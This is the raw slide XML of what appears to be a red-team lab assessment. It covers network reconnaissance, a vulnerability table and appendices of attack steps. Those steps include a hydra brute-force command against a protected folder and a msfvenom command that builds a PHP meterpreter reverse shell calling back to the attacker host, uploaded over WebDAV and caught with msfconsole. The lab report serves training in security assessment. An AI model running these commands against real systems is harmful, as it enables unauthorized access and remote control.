            <a:ext cx="2371500" cy="32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  # hydra –l ashton –P /usr/share/wordlists/rockyou.txt –s 80 –f -v 192.168.1.105 http-get /company_folders/secret_folder</a:t>
            </a:r>
            <a:endParaRPr sz="12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  Crack Station website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  Note:  Hash password was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  indicated in the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  ‘connect_to_corp_server’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  file.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" name="Google Shape;1172;p1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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Appendix C1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>File/Shell 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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cript 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U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ploads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1173" name="Google Shape;1173;p1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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1174" name="Google Shape;1174;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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5" name="Google Shape;1175;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="31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sz="1200" b="1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Tools used to upload a PHP reverse shell payload script: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  -  File Manager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  -  msvenom</a:t>
            </a:r>
            <a:endParaRPr sz="12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  </a:t>
            </a:r>
            <a:endParaRPr sz="12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76" name="Google Shape;1176;p16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177" name="Google Shape;1177;p1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lang="en-US" sz="21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78" name="Google Shape;1178;p16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79" name="Google Shape;1179;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1180" name="Google Shape;1180;p1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lang="en-US" sz="21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81" name="Google Shape;1181;p16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82" name="Google Shape;1182;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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3" name="Google Shape;1183;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31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sz="1200" b="1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Ability to upload a PHP script to the WebDav server.</a:t>
            </a:r>
            <a:endParaRPr sz="12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84" name="Google Shape;1184;p16"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1185" name="Google Shape;1185;p1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lang="en-US" sz="21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86" name="Google Shape;1186;p16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87" name="Google Shape;1187;p16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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8" name="Google Shape;1188;p16"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2371500" cy="32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  From file manager,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   connect to WebDav server:    dav://192.168.1.105/webdav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71450" marR="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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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Create and upload a PHP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    reverse shell payload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    script called ‘shell.php’.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1" name="Google Shape;1201;p1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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Appendix C2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>File/Shell 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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>cript 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U</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ploads</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Create and upload a reverse shell payload script:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="14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r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfvenom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> –p php/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>meterpreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>reverse_tcp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>lhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>=192.168.1.8 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>lport</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>=4444 &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>shell.php</a:t>
            </a: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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>     -  Using default port 4444.</a:t>
            </a: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4C68E9-96CE-4C5E-9A65-BA36234E9A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970" y="1796825"/>
            <a:ext cx="8127435" cy="1497461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5" name="Google Shape;1215;p2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dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Appendix D1: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Reverse Shell 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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ession</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1216" name="Google Shape;1216;p2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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1217" name="Google Shape;1217;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="724275" y="1480575"/>
            <a:ext cx="2428500" cy="31542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8" name="Google Shape;1218;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="724275" y="1480624"/>
            <a:ext cx="2371500" cy="31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sz="1200" b="1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Tools used to execute a reverse shell session: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  -  msfconsole</a:t>
            </a:r>
            <a:endParaRPr sz="12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  -  Web browser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  </a:t>
            </a:r>
            <a:endParaRPr sz="12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219" name="Google Shape;1219;p20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220" name="Google Shape;1220;p2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lang="en-US" sz="21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221" name="Google Shape;1221;p20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22" name="Google Shape;1222;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3228956" y="887903"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1223" name="Google Shape;1223;p2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lang="en-US" sz="21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224" name="Google Shape;1224;p20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25" name="Google Shape;1225;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3496050" y="1480575"/>
            <a:ext cx="2428500" cy="31542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6" name="Google Shape;1226;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3496050" y="1480625"/>
            <a:ext cx="2428500" cy="31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Ability to execute a reverse shell to start a meterpreter session.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227" name="Google Shape;1227;p20"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6134081" y="888653"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1228" name="Google Shape;1228;p2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lang="en-US" sz="21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229" name="Google Shape;1229;p20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30" name="Google Shape;1230;p20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2428500" cy="32523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1" name="Google Shape;1231;p20"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6401175" y="1481325"/>
            <a:ext cx="2371500" cy="32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171450" marR="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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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# msfconsole</a:t>
            </a:r>
            <a:endParaRPr sz="12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   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-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"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Navigate to the WebDav website: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    192.168.1.105/webdav</a:t>
            </a:r>
            <a:endParaRPr sz="12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   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6" name="Google Shape;1236;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-12300" y="6626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r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Appendix D2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Reverse Shell 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S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>ession </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="24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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Exploit used to create a listener:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1239" name="Google Shape;1239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4970" y="1164935"/>
            <a:ext cx="6336792" cy="20116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54683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4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="115375" y="910475"/>
            <a:ext cx="6699600" cy="3897600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="1D8BE6">
              <a:alpha val="14117"/>
            </a:srgbClr>
          </a:solidFill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400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1058" name="Google Shape;1058;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7052550" y="966875"/>
            <a:ext cx="1814100" cy="3784800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="DBD9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 dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:endParaRPr sz="1100" b="1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Address Range: 192.168.1.0 /24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Netmask: 255.255.255.0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Gateway: 192.168.1.1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 dirty="0">
                <a:latin typeface="Roboto Black"/>
                <a:ea typeface="Roboto Black"/>
                <a:cs typeface="Roboto Black"/>
                <a:sym typeface="Roboto Black"/>
              </a:rPr>
              <a:t>Machines</a:t>
            </a:r>
            <a:endParaRPr sz="1100" dirty="0">
              <a:latin typeface="Roboto Black"/>
              <a:ea typeface="Roboto Black"/>
              <a:cs typeface="Roboto Black"/>
              <a:sym typeface="Roboto Black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IPv4: 192.168.1.8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OS:  Linux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Hostname: Kali Linux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IPv4: 192.168.1.105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 dirty="0"/>
              <a:t>OS:  Linux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Hostname: Capstone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IPv4: 192.168.1.100:5601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OS:  Linux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Hostname: Kibana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endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1059" name="Google Shape;1059;p4"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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Network Topology</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1060" name="Google Shape;1060;p4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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1061" name="Google Shape;1061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92203" y="942716"/>
            <a:ext cx="4145944" cy="38089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6" name="Google Shape;1066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067" name="Google Shape;1067;p5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en-US"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</a:t>
            </a:fld>
            <a:endParaRPr sz="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8" name="Google Shape;1068;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="274325" y="1851100"/>
            <a:ext cx="8595300" cy="10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/>
              <a:t>Red Team</a:t>
            </a:r>
            <a:endParaRPr b="1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latin typeface="Roboto Light"/>
                <a:ea typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
                <a:sym typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Security Assessment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069" name="Google Shape;1069;p5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074;p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Recon: Describing the Target</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1075" name="Google Shape;1075;p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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>Nmap identified the following hosts on the network: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076" name="Google Shape;1076;p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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1077" name="Google Shape;1077;p6"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr/>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="419800" y="1198750"/>
          <a:ext cx="8346600" cy="3577125"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{63185B22-D61D-45F9-9CB7-DBD8C1C59AAB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="278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82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82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032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Hostname</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none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IP Address</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none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Role on Network</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none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34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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kali Linux </a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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192.168.1.8</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Attacker</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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934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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Capstone </a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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192.168.1.105</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Victim</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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934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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Kibana</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400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192.168.1.100:5601</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Data visualization dashboard</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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934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Google Shape;1082;p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Vulnerability Assessment</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083" name="Google Shape;1083;p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latin typeface="Roboto Medium"/>
                <a:ea typeface="Roboto Medium"/>
                <a:cs typeface="Roboto Medium"/>
                <a:sym typeface="Roboto Medium"/>
              </a:rPr>
              <a:t>The assessment uncovered the following critical vulnerabilities in the target:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1084" name="Google Shape;1084;p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endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="1085" name="Google Shape;1085;p7"/>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1434619078"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="467150" y="1201900"/>
          <a:ext cx="8362500" cy="3466950"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{63185B22-D61D-45F9-9CB7-DBD8C1C59AAB}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2787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87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87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74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Vulnerability</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none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Description</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none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Impact</a:t>
                      </a:r>
                      <a:endParaRPr sz="1400" b="1" u="none" strike="noStrike" cap="none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67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b="0" i="0" u="none" strike="noStrike" cap="none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Access sensitive information.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" b="0" i="0" u="none" strike="noStrike" cap="none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i="0" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Access to sensitive directories/files such as the ‘secret_folder’ and its contents.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="0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i="0" u="none" strike="noStrike" cap="none">
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>This vulnerability allows attackers to view sensitive documents to exploit the system or steal data.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" i="0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67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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute force attacks.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Brute force attacks allows retrieval of account/user passwords.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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A brute force attack allows attackers access to accounts to gain access to a system.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="none" strike="noStrike" cap="none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67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File/shell script uploads.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="none" strike="noStrike" cap="none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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Unauthorized ability to upload files and shell scripts.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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Victim’s unknowingly execute/click on these malicious files infecting or allowing access to their system .</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="none" strike="noStrike" cap="none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67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>
                          <a:latin typeface="Roboto"/>
                          <a:ea typeface="Roboto"/>
                          <a:cs typeface="Roboto"/>
                          <a:sym typeface="Roboto"/>
                        </a:rPr>
                        <a:t>Reverse shell session.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200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Ability to initiate a shell session from the target’s machine.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="none" strike="noStrike" cap="none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Access to a target’s shell/session  allows attackers to maneuver within a system and exploit it.</a:t>
                      </a:r>
                      <a:endParaRPr sz="1200" u="none" strike="noStrike" cap="none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Google Shape;1119;p11"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-24600" y="-27304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dirty="0"/>
              <a:t>Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="0" i="0" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Access Sensitive Information</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2400" b="0" i="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r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
